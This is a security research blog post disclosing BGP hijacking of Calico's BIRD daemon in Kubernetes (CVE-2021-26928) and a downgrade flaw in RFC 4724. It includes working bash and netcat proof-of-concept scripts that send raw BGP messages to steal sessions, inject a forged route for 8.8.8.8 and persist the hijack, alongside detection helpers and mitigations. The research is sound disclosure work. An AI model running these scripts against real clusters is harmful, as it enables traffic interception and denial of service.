In Part 1 of this blog post, we discussed attack vectors that utilize the different features of the devices that network plugins use, such as bridge devices and tunneling devices (VXLAN in particular).
In this second part, we’ll discuss one of the most important aspects of network plugins: the responsibility of setting and updating the routing data.
There are multiple ways of updating the routing data. Some network plugins use Kubernetes annotations to share updates, some rely on the cloud provider’s routing functionality, and some use routing daemons (such as BIRD, bgpd, GoBGP, etc.) to distribute routing updates with protocols such as BGP (Border Gateway Protocol) and OSPF (Open Shortest Path First).
From the attacker’s perspective, gaining control over the routing updates is a great achievement. Such an attacker can use it for a stealthy MiTM attack on a broad, multi-subnet network, which is much harder to detect than LAN-based methods such as ARP spoofing.
- This research led to CVE-2021-26928 and an erratum for a BGP RFC. We found a way to hijack the BGP session in Calico’s architecture, as well as a logical flaw in BGP RFC 4724 that leads to a security issue allowing persistent BGP hijacking.
- Routing daemons on Kubernetes clusters face a different threat model than internet routing infrastructure. Instead of hardened routing components with stripped-down capabilities, they run on complete operating systems with third-party products installed, so all the standard attack vectors are valid ways to gain a grip on the routing mechanisms.
- Network plugins that leverage BGP routing daemons should implement a secure configuration to minimize their attack surface. TCP-MD5, for example, is a significant mitigation technique for various attack vectors on the BGP protocol.
Abusing Routing Protocols in Kubernetes Environments
In this section, you will see how the aforementioned routing daemons can be attacked in order to place any machine, on-premises or even in the cloud, in a MiTM position in the cluster.
This time, I’ll use Calico as the network plugin for these examples. Calico runs as a pod on every Kubernetes node, and one of the key components in Calico’s pod is the BIRD routing daemon. BIRD is an internet routing daemon; in Calico, it picks up the routes from the kernel and distributes them to the BGP peers on the network.
Before we continue with the explanation of the attack vector, let’s say a few words about BGP.
Since there are far too many details to get into, I’ll just focus on the ones that are most relevant to this section.
BGP is a path-vector routing protocol: each route it advertises carries the full path, as a list of autonomous systems, from point A to point B. It’s the standard for internet routing and is required by most internet service providers (ISPs) to establish routing between one another.
A BGP session would look something like this:
Figure.1 – BGP session establishment
As you can see, a full TCP three-way handshake (BGP runs over TCP port 179) must complete before any BGP message is exchanged.
In Calico’s architecture, BIRD uses a configuration file that confd builds from the information in etcd. This configuration allows only known cluster peers (the worker nodes) to set up a TCP connection with BIRD; any other host simply receives a TCP RST packet. After the TCP three-way handshake, the BGP session starts with an OPEN message, in which each peer shares its identifiers and the BGP capabilities it would like to activate.
I would describe BGP capabilities as a collection of features that the peer supports.
For example, one capability is Multiprotocol Extensions for BGP-4.
If one peer sends this capability to the other as part of its OPEN message, it is saying, “I would like to share with you not only IPv4 routing information but also routing information for other network-layer protocols (such as IPv6).”
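After the OPEN messages are exchanged, each peer confirms the session by sending a KEEPALIVE message.
From then on, the peers keep sending each other KEEPALIVE messages often enough that the hold time negotiated in the OPEN messages never expires (RFC 4271 suggests one third of the hold time as the interval).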
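Every one of these messages starts with the same 19-byte header defined in RFC 4271: a 16-byte marker set to all ones, a 2-byte total length and a 1-byte type (1 = OPEN, 2 = UPDATE, 3 = NOTIFICATION, 4 = KEEPALIVE, 5 = ROUTE-REFRESH). The bash sketch below parses that header from the `\x`-escaped notation used in this post's PoC; the function names `esc_to_hex` and `bgp_header` are hypothetical helpers, not part of any tool.

```bash
#!/usr/bin/env bash
# esc_to_hex: turn the post's '\xff\x00...' notation into plain hex ("ff00...").
esc_to_hex() { printf '%s' "$1" | tr -d '\\x'; }

# bgp_header HEX: validate the 16-byte marker, then print the Length and Type
# fields of the 19-byte header that starts every BGP message (RFC 4271).
bgp_header() {
  local hex=$1
  local marker=${hex:0:32}
  local len=$(( 16#${hex:32:4} ))
  local type=$(( 16#${hex:36:2} ))
  local -a names=([1]=OPEN [2]=UPDATE [3]=NOTIFICATION [4]=KEEPALIVE [5]=ROUTE-REFRESH)
  if [[ $marker != "$(printf 'f%.0s' {1..32})" ]]; then
    echo "invalid marker" >&2
    return 1
  fi
  echo "length=$len type=${names[type]:-UNKNOWN}"
}

# Example: the KEEPALIVE message from the PoC in this post.
bgp_header "$(esc_to_hex '\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x13\x04')"
# prints: length=19 type=KEEPALIVE
```

A KEEPALIVE is nothing but this header, which is why its length is exactly 19 bytes.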
The “heart” of the protocol would be the UPDATE message that carries the routing updates.
That’s the way one peer tells the other, “If you are looking for subnet a.b.c.d/24, you can send it to me. Path X can get you there.”
Figure.2 – BGP UPDATE message
Last, but not least, is the NOTIFICATION message.
NOTIFICATION messages are how BGP informs a peer about an issue. Each one includes a major and a minor error code (the full list is maintained in IANA’s BGP Error (Notification) Codes registry). For example, when a daemon is deliberately shut down, it notifies its peers with a Cease NOTIFICATION.
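To make the major/minor code pairs concrete, here is a small lookup sketch covering a subset of the codes from RFC 4271 (plus Unsupported Capability from RFC 5492 and the Cease subcodes from RFC 4486). The function name is hypothetical, and the table is deliberately not exhaustive.

```bash
#!/usr/bin/env bash
# bgp_notification_name MAJOR MINOR: name a NOTIFICATION's error code and,
# for a few common cases, its subcode. Not an exhaustive table.
bgp_notification_name() {
  local major=$1 minor=$2 name sub=""
  case $major in
    1) name="Message Header Error" ;;
    2) name="OPEN Message Error"
       case $minor in
         1) sub="Unsupported Version Number" ;;
         2) sub="Bad Peer AS" ;;
         3) sub="Bad BGP Identifier" ;;
         4) sub="Unsupported Optional Parameter" ;;
         6) sub="Unacceptable Hold Time" ;;
         7) sub="Unsupported Capability" ;;
       esac ;;
    3) name="UPDATE Message Error" ;;
    4) name="Hold Timer Expired" ;;
    5) name="Finite State Machine Error" ;;
    6) name="Cease"
       case $minor in
         2) sub="Administrative Shutdown" ;;
         4) sub="Administrative Reset" ;;
         7) sub="Connection Collision Resolution" ;;
       esac ;;
    *) name="Unknown error code $major" ;;
  esac
  echo "$name${sub:+: $sub}"
}

bgp_notification_name 6 2   # prints: Cease: Administrative Shutdown
bgp_notification_name 2 4   # prints: OPEN Message Error: Unsupported Optional Parameter
```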
Figure.3 – BGP NOTIFICATION message
Going back to the security aspect, it’s important to be familiar with a well-known BGP attack called BGP hijacking. It occurs when an attacker gains control of a BGP session and injects a routing update into the network. The attack is especially effective when the injected routing information is more specific than the current information, for example:
- Current information – a.b.0.0/16
- Injected information – a.b.c.0/24
Routers forward traffic according to the longest (most specific) matching prefix, which is assumed to be the more accurate route. The more specific route therefore “wins” the routing decision, granting the attacker the ability to control the data flow for this subnet.
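Longest-prefix matching is what makes the injected /24 beat the legitimate /16. A pure-bash sketch of that rule follows; the function names and the 10.1.x.x addresses (standing in for a.b.0.0/16 and a.b.c.0/24) are hypothetical, and a real router performs a routing-table lookup rather than a loop like this.

```bash
#!/usr/bin/env bash
# ip_to_int A.B.C.D: the address as a 32-bit integer.
ip_to_int() {
  local -a o
  IFS=. read -r -a o <<< "$1"
  echo $(( (10#${o[0]} << 24) | (10#${o[1]} << 16) | (10#${o[2]} << 8) | 10#${o[3]} ))
}

# in_prefix IP CIDR: succeed if IP falls inside CIDR.
in_prefix() {
  local addr net len mask
  addr=$(ip_to_int "$1")
  net=$(ip_to_int "${2%/*}")
  len=${2#*/}
  mask=$(( len == 0 ? 0 : (0xFFFFFFFF << (32 - len)) & 0xFFFFFFFF ))
  (( (addr & mask) == (net & mask) ))
}

# longest_match IP CIDR...: print the most specific CIDR that contains IP.
longest_match() {
  local dst=$1 best="" best_len=-1 route len
  shift
  for route in "$@"; do
    len=${route#*/}
    if in_prefix "$dst" "$route" && (( len > best_len )); then
      best=$route
      best_len=$len
    fi
  done
  echo "$best"
}

# The legitimate /16 versus a hijacked, more specific /24:
longest_match 10.1.2.3 10.1.0.0/16 10.1.2.0/24   # prints: 10.1.2.0/24
longest_match 10.1.3.3 10.1.0.0/16 10.1.2.0/24   # prints: 10.1.0.0/16
```

Only destinations inside the injected /24 are diverted; the rest of the /16 keeps flowing normally, which is part of what makes this kind of hijack hard to notice.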
Only a true BGP peer can submit a routing update, and BGP peers are able to establish a connection only if they are configured to do so. So, an attacker trying to perform BGP hijacking will rely on one of the following to become a proper peer:
- Type 1: An operator mistake allows the attacker to impersonate a legitimate peer.
- Type 2: One of the peers was compromised and is now under the control of an attacker.
Most of the BGP hijacking incidents on the internet have been of Type 1, caused by operator misconfiguration. Type 2 is rarer: on the internet, BGP daemons typically run on dedicated routers that are not exposed to many of the attacks that threaten general-purpose servers.
In Kubernetes clusters, the situation is different.
The BGP routing daemon resides on all of the nodes as part of a full operating system that provides a variety of services and is, therefore, more vulnerable to possible attack vectors.
That makes Type 2, an attacker-controlled BGP peer, a much more likely scenario. Let’s see how attackers who have gained access to your Kubernetes environment can run a BGP hijacking attack in order to place their server in a MiTM position in the cluster.
The attacker’s starting point is a low-privileged user on a node (master or worker), or access to a pod that uses the host network namespace. For example:
- An attacker who gained remote code execution (RCE) through your node’s SCOM agent
- An attacker who got access to a pod configured with hostNetwork
Figure.4 – An abstraction of node network architecture when using Calico as Kubernetes network plugin
To run a simple route-distribution DoS, it’s enough to steal the TCP session. By “steal” we mean opening a TCP session with the targeted BGP peer. That’s it; there’s no need to send any data. Because the connection originates from the node’s own IP address, BIRD, as Calico configures it, accepts it as coming from a known peer. The connection then holds for a full two minutes, during which the legitimate BGP daemon on the node you are on cannot reestablish its session. If two minutes isn’t enough, you can simply repeat the trick over and over again.
Figure.5 – Simple DoS attack using Netcat
Figure.6 – Explanation of the DoS attack flow
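From the defender's side, one way to spot this kind of session theft on a node is to look for port-179 connections that are not owned by BIRD. Below is a heuristic sketch; it assumes BIRD appears as `bird` (or `bird6`) in the process column of `ss -p` output, the function name is hypothetical, and an attacker with root on the node could still evade such a check.

```bash
#!/usr/bin/env bash
# suspicious_bgp_sessions: read `ss -Htnp` output on stdin and print only the
# TCP connections on port 179 whose owning process is not BIRD.
# Heuristic: assumes BIRD is listed as "bird" or "bird6" in the users:(...) column.
suspicious_bgp_sessions() {
  awk '($0 ~ /:179[ \t]/ || $0 ~ /:179$/) && $0 !~ /users:\(\("bird6?"/'
}

# Usage on a node (root is needed for -p to show other users' processes):
#   ss -Htnp state established | suspicious_bgp_sessions
```

Any line it prints, such as an `nc` process holding a session to a peer's port 179, deserves a closer look.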
But, of course, if you can already steal the TCP session, why not just hijack the BGP session?
BGP Hijacking and Gaining MiTM Position
In order to hijack the session, the attacker sends the following sequence of BGP messages:
- OPEN – opens the BGP session
- KEEPALIVE – confirms the OPEN message received from the peer
- UPDATE – updates the routing data between the peers (Kubernetes nodes, in this case)
If the UPDATE message includes a forged NEXT_HOP value together with a “better route” (for example, a more specific subnet A.B.C.0/24 instead of A.B.0.0/16), we can make the receiving peer send packets wherever we want, even outside of the cluster.
To make this more practical, let’s look at the following architecture:
Figure.7 – BGP hijacking attack scenario
As a PoC, we will place the attacker-controlled server in a MiTM position for Google’s DNS IP (8.8.8.8).
We can do that by using these easy-to-use bash commands.
Please note that the code snippets below contain tagged sections, which mark the bytes described in the accompanying NOTE comments. These tags must be deleted for the script to run properly.
The tags have the following structure:
<#> Start of tagging
</#> End of tagging
# Setting up the TCP connection with the Master node
tmpd=$(mktemp -d)
tmpf="$tmpd"/fifo
mkfifo "$tmpf"
nc 192.168.198.170 179 < "$tmpf" &
ncpid=$!
# Keep the FIFO open for writing, so nc does not hit EOF between the echo commands below
exec 3>"$tmpf"

# OPEN Message
# ! NOTE - The tagged parts are the BGP AS (\xfc\x00 => 64512) and the BGP ID (\xc0\xa8\xc6\xab => 192.168.198.171)
echo -ne '\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x3f\x01\x04<#>\xfc\x00</#>\x00\xf0<#>\xc0\xa8\xc6\xab</#>\x22\x02\x20\x01\x04\x00\x01\x00\x01\x02\x00\x40\x06\x80\x78\x00\x01\x01\x80\x41\x04\x00\x00\xfc\x00\x45\x04\x00\x01\x01\x03\x46\x00\x47\x00' > "$tmpf"
Figure.8 – BGP OPEN message
# KeepAlive Message
echo -ne '\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x13\x04' > "$tmpf"

# UPDATE Messages
# ! NOTE - The tagged parts are the NEXT_HOP (\xc0\xa8\xc6\xa1 -> 192.168.198.161), the PathID we chose (\x00\x00\x00\x03 -> 3) and the affected subnet (\x20\x08\x08\x08\x08 -> 8.8.8.8/32)
echo -ne '\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x46\x02\x00\x00\x00\x15\x40\x01\x01\x00\x40\x02\x00\x40\x03\x04<#>\xc0\xa8\xc6\xa1</#>\x40\x05\x04\x00\x00\x00\x64\x00\x00\x00\x02\x1a\xc0\xa8\x68\x00\x00\x00\x00\x05\x18\xc0\xa8\xc6<#>\x00\x00\x00\x03</#><#>\x20\x08\x08\x08\x08</#>' > "$tmpf"
# End-of-RIB marker: an UPDATE with no withdrawn routes, no path attributes and no NLRI
echo -ne '\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x17\x02\x00\x00\x00\x00' > "$tmpf"
Several parameters matter when running this attack:
- An OPEN message should include specific parameters:
  - My AS – Calico’s default is 64512 (an AS, or Autonomous System, is a collection of connected IP routing prefixes under the control of one or more network operators)
  - BGP Identifier – the source IP address (192.168.198.171, the node the attacker is on, in our PoC)
Figure.12 – BGP OPEN message most relevant fields
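The same fields can be read straight out of the PoC's OPEN bytes. A minimal decoding sketch for the fixed part of an OPEN message (RFC 4271), assuming the message is given as plain hex with the `<#>` tags and `\x` prefixes removed; `byte_at` and `decode_open` are hypothetical helper names.

```bash
#!/usr/bin/env bash
# byte_at HEX OFFSET: value of the byte at OFFSET (0-based) in a plain hex string.
byte_at() { echo $(( 16#${1:$(( $2 * 2 )):2} )); }

# decode_open HEX: print the fixed fields of a BGP OPEN message (RFC 4271).
decode_open() {
  local hex=$1 version my_as hold bgp_id optlen
  version=$(byte_at "$hex" 19)                                     # right after the 19-byte header
  my_as=$(( $(byte_at "$hex" 20) * 256 + $(byte_at "$hex" 21) ))   # 2-byte My AS
  hold=$(( $(byte_at "$hex" 22) * 256 + $(byte_at "$hex" 23) ))    # Hold Time, in seconds
  bgp_id="$(byte_at "$hex" 24).$(byte_at "$hex" 25).$(byte_at "$hex" 26).$(byte_at "$hex" 27)"
  optlen=$(byte_at "$hex" 28)                                       # Optional Parameters Length
  echo "version=$version my_as=$my_as hold_time=$hold bgp_id=$bgp_id opt_params_len=$optlen"
}

# The PoC's OPEN message as plain hex.
marker=$(printf 'f%.0s' {1..32})
open_msg=${marker}003f01            # marker, length 63, type 1 (OPEN)
open_msg+=04fc0000f0c0a8c6ab        # version, My AS, Hold Time, BGP Identifier
open_msg+=220220                    # Optional Parameters: length 34, one Capabilities parameter of 32 bytes
open_msg+=010400010001
open_msg+=0200
open_msg+=4006807800010180
open_msg+=41040000fc00
open_msg+=450400010103
open_msg+=46004700

decode_open "$open_msg"
# prints: version=4 my_as=64512 hold_time=240 bgp_id=192.168.198.171 opt_params_len=34
```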
- An UPDATE message should include:
  - The “new” NEXT_HOP – the IP of the MiTM machine
  - The “new and better” destination subnet – in our PoC, 8.8.8.8/32
Figure.13 – BGP UPDATE message most relevant fields
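To see those two fields in the PoC's UPDATE bytes, here is a decoding sketch, again assuming plain hex input with the tags removed; `byte_at` and `decode_update` are hypothetical helpers. Note that ADD-PATH is not visible in the message itself: the decoder has to be told whether Path IDs are present, just as a real receiver learns it from the OPEN exchange.

```bash
#!/usr/bin/env bash
# byte_at HEX OFFSET: value of the byte at OFFSET (0-based) in a plain hex string.
byte_at() { echo $(( 16#${1:$(( $2 * 2 )):2} )); }

# decode_update HEX ADDPATH
#   HEX:     an UPDATE message as plain hex (no \x prefixes, no <#> tags)
#   ADDPATH: 1 if ADD-PATH was negotiated (each NLRI entry starts with a 4-byte Path ID)
# Prints the NEXT_HOP attribute and every IPv4 prefix announced in the NLRI field.
decode_update() {
  local hex=$1 addpath=${2:-0}
  local total=$(( ${#hex} / 2 )) off=19 wlen alen aend flags type len pid plen nbytes i
  local -a oct
  wlen=$(( $(byte_at "$hex" $off) * 256 + $(byte_at "$hex" $((off + 1))) ))
  off=$(( off + 2 + wlen ))                          # skip Withdrawn Routes
  alen=$(( $(byte_at "$hex" $off) * 256 + $(byte_at "$hex" $((off + 1))) ))
  off=$(( off + 2 )); aend=$(( off + alen ))
  while (( off < aend )); do                         # walk the Path Attributes
    flags=$(byte_at "$hex" $off); type=$(byte_at "$hex" $((off + 1)))
    if (( flags & 0x10 )); then                      # Extended Length flag: 2-byte length
      len=$(( $(byte_at "$hex" $((off + 2))) * 256 + $(byte_at "$hex" $((off + 3))) )); off=$(( off + 4 ))
    else
      len=$(byte_at "$hex" $((off + 2))); off=$(( off + 3 ))
    fi
    if (( type == 3 )); then                         # NEXT_HOP
      echo "next_hop $(byte_at "$hex" $off).$(byte_at "$hex" $((off + 1))).$(byte_at "$hex" $((off + 2))).$(byte_at "$hex" $((off + 3)))"
    fi
    off=$(( off + len ))
  done
  while (( off < total )); do                        # NLRI runs to the end of the message
    pid=""
    if (( addpath )); then
      pid=$(( $(byte_at "$hex" $off) << 24 | $(byte_at "$hex" $((off + 1))) << 16 | $(byte_at "$hex" $((off + 2))) << 8 | $(byte_at "$hex" $((off + 3))) ))
      off=$(( off + 4 ))
    fi
    plen=$(byte_at "$hex" $off); nbytes=$(( (plen + 7) / 8 )); oct=(0 0 0 0)
    for (( i = 0; i < nbytes; i++ )); do oct[i]=$(byte_at "$hex" $(( off + 1 + i ))); done
    off=$(( off + 1 + nbytes ))
    echo "nlri ${oct[0]}.${oct[1]}.${oct[2]}.${oct[3]}/$plen${pid:+ path_id=$pid}"
  done
}

marker=$(printf 'f%.0s' {1..32})
attrs=40010100400200400304c0a8c6a140050400000064      # ORIGIN, AS_PATH, NEXT_HOP, LOCAL_PREF
nlri_ap=000000021ac0a86800                             # Path ID 2, 192.168.104.0/26
nlri_ap+=0000000518c0a8c6                              # Path ID 5, 192.168.198.0/24
nlri_ap+=000000032008080808                            # Path ID 3, 8.8.8.8/32
update_addpath=${marker}00460200000015${attrs}${nlri_ap}

decode_update "$update_addpath" 1
# prints:
# next_hop 192.168.198.161
# nlri 192.168.104.0/26 path_id=2
# nlri 192.168.198.0/24 path_id=5
# nlri 8.8.8.8/32 path_id=3
```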
While running these attack steps with Wireshark open on the attacker-controlled server (MiTM), we noticed that after just a few packets, the connection returned to its original state. That’s because the legitimate connection “stole” the session back pretty quickly.
Figure.14 – The valid session reestablishing its session
Looking at the BGP session, you can see:
Figure.15 – The full flow of this attack scenario
This is enough for a PoC, but we wanted to achieve a persistent BGP session. This unexpectedly led us to uncover an overlooked security issue in one of BGP’s RFCs: RFC 4724, Graceful Restart Mechanism for BGP.
BGP Hijacking Persistence
Before we continue, let’s see why we were able to hijack the session in the first place. A second TCP connection can take over the session because of the Graceful Restart capability advertised in the OPEN message:
Figure.16 – BGP OPEN message “Graceful Restart Capability”
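The capability list can also be read from the PoC's OPEN bytes. In the sketch below (helper names hypothetical), code 1 is Multiprotocol Extensions, 2 is Route Refresh, 64 is Graceful Restart, 65 is 4-octet AS numbers and 69 is ADD-PATH (“Support for Additional Paths”). For Graceful Restart, the value starts with 4 bits of Restart Flags (the top one being the Restart State bit) followed by a 12-bit Restart Time in seconds, as defined in RFC 4724. An OPEN whose Optional Parameters Length is 0, like the hypothetical `downgraded_open` below, lists nothing at all.

```bash
#!/usr/bin/env bash
# byte_at HEX OFFSET: value of the byte at OFFSET (0-based) in a plain hex string.
byte_at() { echo $(( 16#${1:$(( $2 * 2 )):2} )); }

# list_capabilities HEX: print the capabilities carried in an OPEN message's
# Optional Parameters, decoding Graceful Restart (code 64) in more detail.
list_capabilities() {
  local hex=$1
  local off=29 end ptype plen pend code clen flags_time_hi time_lo
  end=$(( 29 + $(byte_at "$hex" 28) ))     # byte 28 = Optional Parameters Length
  while (( off < end )); do
    ptype=$(byte_at "$hex" "$off")
    plen=$(byte_at "$hex" $(( off + 1 )))
    off=$(( off + 2 ))
    pend=$(( off + plen ))
    if (( ptype == 2 )); then                # parameter type 2 = Capabilities
      while (( off < pend )); do
        code=$(byte_at "$hex" "$off")
        clen=$(byte_at "$hex" $(( off + 1 )))
        if (( code == 64 )); then            # Graceful Restart: 4 flag bits + 12-bit Restart Time
          flags_time_hi=$(byte_at "$hex" $(( off + 2 )))
          time_lo=$(byte_at "$hex" $(( off + 3 )))
          echo "cap=64 graceful_restart restart_flag=$(( flags_time_hi >> 7 )) restart_time=$(( (flags_time_hi & 0x0f) * 256 + time_lo ))"
        else
          echo "cap=$code len=$clen"
        fi
        off=$(( off + 2 + clen ))
      done
    fi
    off=$pend
  done
}

marker=$(printf 'f%.0s' {1..32})
fixed=04fc0000f0c0a8c6ab                     # version 4, My AS 64512, hold time 240, BGP ID 192.168.198.171
caps=010400010001                            # 1: Multiprotocol Extensions (IPv4 unicast)
caps+=0200                                   # 2: Route Refresh
caps+=4006807800010180                       # 64: Graceful Restart
caps+=41040000fc00                           # 65: 4-octet AS number
caps+=450400010103                           # 69: ADD-PATH
caps+=46004700                               # 70 and 71, no value
open_msg=${marker}003f01${fixed}220220${caps}
downgraded_open=${marker}001d01${fixed}00    # hypothetical OPEN with no optional parameters

list_capabilities "$open_msg"
```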
Among other things, the Graceful Restart capability dictates how a BGP speaker acts when it receives a second TCP connection from the same peer:
Figure.17 – RFC 4724, behavior of BGP connection when using “Graceful Restart Capability”
That’s pretty straightforward: the Graceful Restart capability changes the BGP FSM (Finite State Machine) so that a new TCP connection from the peer drops the ESTABLISHED connection, instead of being rejected as it would be by default.
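The difference can be captured in a tiny decision function. This is a deliberately simplified model (the function name is hypothetical, and a real BGP FSM tracks far more state): with Graceful Restart negotiated, the new connection replaces the ESTABLISHED session; without it, RFC 4271 (Section 6.8) by default closes the newly created connection when it collides with an ESTABLISHED one.

```bash
#!/usr/bin/env bash
# Simplified model, not a real FSM: what a BGP speaker does when a peer whose
# session is already ESTABLISHED opens a new TCP connection.
#   $1 = "yes" if the Graceful Restart capability was negotiated, otherwise "no"
on_new_connection_while_established() {
  if [[ $1 == yes ]]; then
    # Graceful Restart (RFC 4724): treat it as the peer restarting; the new
    # connection replaces the existing session.
    echo "close-existing"
  else
    # Default collision handling (RFC 4271, Section 6.8): the newly created
    # connection is closed and the ESTABLISHED session is kept.
    echo "close-new"
  fi
}

on_new_connection_while_established yes   # prints: close-existing
on_new_connection_while_established no    # prints: close-new
```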
This is highlighted as a security issue in the same RFC:
Figure.18 – RFC 4724, “Graceful Restart Capability” security considerations
This is tricky: on the one hand, it works to our advantage and allows us to hijack the session; on the other hand, it prevents us from achieving persistence over the BGP connection, because the legitimate peer can take the session back in exactly the same way.
This brings us to the security issue that was overlooked. An attacker can use a NOTIFICATION message with the Unsupported Optional Parameter error code to downgrade the BGP session, causing the receiving peer to strip its capabilities.
Figure.19 – BGP “Unsupported Optional Parameter” NOTIFICATION message
After this NOTIFICATION message is sent, the receiving side tries to reestablish the session without any capabilities, including the Graceful Restart capability we wanted out of the way.
Figure.20 – BGP OPEN message after the “Unsupported Optional Parameter” was sent
That gives an attacker the opportunity to win the network race condition, establish their own BGP session before the legitimate one, and “lock” the session to themselves: without Graceful Restart, a new connection from the legitimate peer no longer replaces the ESTABLISHED session.
To do so, we add the following part before running our previous “non-persistent” commands:
tmpd=$(mktemp -d)
tmpf="$tmpd"/fifo
mkfifo "$tmpf"
nc 192.168.198.170 179 < "$tmpf" &
ncpid=$!
exec 3>"$tmpf"

# Send NOTIFICATION message – Unsupported optional parameter
# ! NOTE - The tagged parts are the BGP NOTIFICATION fields - Major Error code (\x02 -> OPEN Message Error) & Minor Error code (\x04 -> Unsupported Optional Parameter)
echo -ne '\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x15\x03<#>\x02\x04</#>' > "$tmpf"

# Tear down this connection before opening the hijacking session
kill "$ncpid"
exec 3>&-
rm -r "$tmpd"
There’s one last change, a side effect of stripping the capabilities: the “Support for Additional Paths” (ADD-PATH) capability was removed as well. That’s why we should change the UPDATE message format so that it no longer includes the “Path ID” field.
# UPDATE Messages
# ! NOTE - The tagged parts are the NEXT_HOP (\xc0\xa8\xc6\xa1 -> 192.168.198.161), and this time there's no PathID. Just the affected subnet (\x20\x08\x08\x08\x08 -> 8.8.8.8/32)
echo -ne '\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x3a\x02\x00\x00\x00\x15\x40\x01\x01\x00\x40\x02\x00\x40\x03\x04<#>\xc0\xa8\xc6\xa1</#>\x40\x05\x04\x00\x00\x00\x64\x1a\xc0\xa8\x68\x00\x18\xc0\xa8\xc6<#>\x20\x08\x08\x08\x08</#>' > "$tmpf"
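The only difference between the two UPDATE formats is the 4-byte Path Identifier that ADD-PATH (RFC 7911) places in front of each prefix. A small encoding sketch of a single IPv4 NLRI entry (the function name is hypothetical) shows both forms side by side: the prefix length in bits, followed by only as many prefix octets as that length needs.

```bash
#!/usr/bin/env bash
# encode_nlri CIDR [PATH_ID]: hex encoding of one IPv4 NLRI entry.
# Without PATH_ID: <prefix length><significant prefix octets>   (RFC 4271)
# With PATH_ID:    <4-byte Path Identifier> + the same            (ADD-PATH, RFC 7911)
encode_nlri() {
  local prefix=${1%/*} len=${1#*/} pathid=${2:-}
  local -a o
  IFS=. read -r -a o <<< "$prefix"
  local out="" i nbytes=$(( (len + 7) / 8 ))
  if [[ -n $pathid ]]; then
    out=$(printf '%08x' "$pathid")
  fi
  out+=$(printf '%02x' "$len")
  for (( i = 0; i < nbytes; i++ )); do
    out+=$(printf '%02x' "$(( 10#${o[i]} ))")
  done
  echo "$out"
}

encode_nlri 8.8.8.8/32      # prints: 2008080808          (as in the UPDATE above)
encode_nlri 8.8.8.8/32 3    # prints: 000000032008080808  (as in the first, ADD-PATH UPDATE)
```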
From this point on, we are the “rightful” owners of the session and can inject routes as we wish. Thus, we can redirect traffic between two pods to our MiTM server somewhere in the cloud. Note that if IPIP tunneling is used, an IPIP device must be set up on the MiTM server in order to receive the encapsulated packets.
To create an IPIP device on Linux, run the following commands:
ip link add name ipip0 type ipip local [LOCAL_IPv4_ADDRESS] remote 0.0.0.0
ip link set ipip0 up
ip addr add [LOCAL_INTERNAL_IPv4]/[subnet mask] dev ipip0
ip route add [REMOTE_INTERNAL_IPv4]/[subnet mask] dev ipip0

# For example -
# ip link add name ipip0 type ipip local 192.168.148.139 remote 0.0.0.0
# ip link set ipip0 up
# ip addr add 172.16.217.128/24 dev ipip0
# ip route add 172.16.28.0/24 dev ipip0
Mitigations
- First and foremost, make sure your pods are configured properly and that your node OS and third-party software are up to date. These steps will make it difficult for an attacker to gain access to your cluster nodes.
In the attack vector we introduced, it’s important to keep in mind two main points regarding pod configuration. The first is to make sure that a pod is not configured with hostNetwork mode unless there is a real need for it. If there is, we advise blocking the pod from accessing the routing protocol on the cluster nodes (for example, TCP port 179 for BGP). The second point (which we discussed in detail in Part 1 of this blog post) is to drop the pod’s NET_RAW capability, so attackers cannot craft raw packets and spoof outbound traffic from the pod.
- Don’t rely on the default configuration of the network plugin; review and harden the product configuration. In the case of a BGP routing daemon, it is worth enabling an option such as TCP-MD5 authentication, which prevents simple hijacking attacks.
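Both pod-level recommendations map to standard fields of the Kubernetes Pod spec. A minimal sketch, where the pod name and image are hypothetical placeholders:

```bash
# Sketch only: the pod name and image are placeholders.
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: example-app
spec:
  hostNetwork: false          # the default; set explicitly to document intent
  containers:
  - name: app
    image: registry.example.com/example-app:1.0
    securityContext:
      capabilities:
        drop: ["NET_RAW"]
EOF
```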
Tigera released a fix for this attack vector in v3.16.3 of the Calico open-source project that allows users to configure a password to authenticate the BGP peers (Calico Enterprise already had this option).
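As an illustration of that option, here is a sketch of attaching a password to an explicitly configured peer through the `password.secretKeyRef` field of Calico’s BGPPeer resource. Everything named below (secret, key, peer IP, AS number, namespace) is a hypothetical placeholder; it assumes Calico v3.16.3 or later, the password must match on both ends of the session, and Calico’s documentation also describes granting calico-node RBAC permission to read the secret, a step omitted here.

```bash
# Sketch only: names, namespace, peer IP and AS number below are placeholders.
# Assumes Calico v3.16.3 or later and calico-node running in kube-system;
# operator-based installs typically use the calico-system namespace instead.
kubectl create secret generic bgp-secrets -n kube-system \
  --from-literal=peer-password='<a-strong-shared-secret>'

calicoctl apply -f - <<'EOF'
apiVersion: projectcalico.org/v3
kind: BGPPeer
metadata:
  name: example-peer
spec:
  peerIP: 192.168.198.170
  asNumber: 64512
  password:
    secretKeyRef:
      name: bgp-secrets
      key: peer-password
EOF
```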
- In Part 1 of this blog post, we mentioned the dangers of attackers spoofing IP addresses from within pods. One of them is that an attacker can spoof the IP address of the host, which lets them initiate a TCP three-way handshake that might cause the BGP DoS described earlier in this blog post. To block this, drop the NET_RAW capability in the pod settings (there is a detailed explanation of this in Part 1). Calico also has an out-of-the-box policy that should mitigate this risk.
The use of routing daemons on Kubernetes clusters introduces new threat models that exploit the known security limitations of routing protocols. An attacker can exploit these new rules of the game to manipulate data traffic throughout the cluster, starting from low-privileged access to a single node.
We hope that introducing the various features of Kubernetes routing daemons, along with the attack vector examples and mitigation recommendations, will help you understand how an attacker can use the routing infrastructure to gain a particularly strong grip on the cluster, and how you can stop it.
We also encourage you to examine your network plugin products in depth to determine whether they provide adequate protection. We recommend that you not settle for out-of-the-box defaults, and instead make the necessary adjustments and configurations to improve security.
